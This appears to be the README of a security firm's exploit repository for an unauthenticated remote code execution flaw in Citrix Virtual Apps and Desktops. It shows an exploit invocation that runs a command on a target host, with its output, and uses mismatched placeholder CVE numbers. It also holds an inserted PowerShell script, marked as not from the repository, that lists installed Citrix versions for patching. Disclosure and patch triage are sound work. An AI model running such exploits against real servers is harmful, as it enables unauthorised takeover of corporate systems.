
Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE


watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit


CVE-2024-xxxx

Citrix Virtual Apps and Desktops (XEN) Unauthenticated Remote Code Execution

See our blog post for technical details

Demo video: citrix-xen-exploit-demo.mp4

PoC in Action

```text
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-xxxx-xxxxx.py
        (*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr

          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)

        CVEs: [CVE-xxxx-xxxxx]

[INFO] Command sent to 192.168.1.120 successfully!
```

Affected Versions

Citrix Virtual Apps and Desktops 7 2402 LTSR and every earlier version are vulnerable. Consult the Citrix advisory for the exact fixed builds before treating a deployment as patched.
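As an added inventory check, not part of the watchTowr repository or its exploit, the PowerShell below lists every Citrix product registered in the Windows Uninstall registry hives (64-bit and WOW6432Node) on one or more hosts, so the reported DisplayVersion can be compared against the fixed builds in the Citrix advisory. The host names are placeholders; "2402 LTSR" above is a release name rather than a build number, so map it using the advisory instead of hard-coding a threshold here.

```powershell
# Added example: enumerate installed Citrix products and versions for patch triage.
# Relies only on the standard Uninstall registry keys and WinRM (Invoke-Command).
function Get-CitrixInstalledProduct {
    [CmdletBinding()]
    param(
        # Hosts to query; defaults to the local machine. Remote hosts need WinRM enabled.
        [string[]]$ComputerName = $env:COMPUTERNAME
    )

    $probe = {
        $paths = @(
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
        )
        Get-ItemProperty -Path $paths -ErrorAction SilentlyContinue |
            Where-Object { $_.DisplayName -like 'Citrix*' } |
            ForEach-Object {
                [pscustomobject]@{
                    Computer    = $env:COMPUTERNAME   # resolves on the remote side under Invoke-Command
                    Product     = $_.DisplayName
                    Version     = $_.DisplayVersion   # compare against the advisory's fixed build
                    InstallDate = $_.InstallDate
                }
            }
    }

    foreach ($target in $ComputerName) {
        if ($target -ieq $env:COMPUTERNAME) {
            & $probe
        } else {
            Invoke-Command -ComputerName $target -ScriptBlock $probe
        }
    }
}

# Placeholder host names (assumed): a Delivery Controller and a VDA.
Get-CitrixInstalledProduct -ComputerName 'ddc01', 'vda01' |
    Sort-Object Computer, Product |
    Format-Table -AutoSize
```

Run it from an account with local administrator rights on the targets; entries that predate the advisory's fixed build are the ones to schedule for upgrade, and hosts that return nothing either have no Citrix components or could not be reached over WinRM, which the error stream will show.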

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team
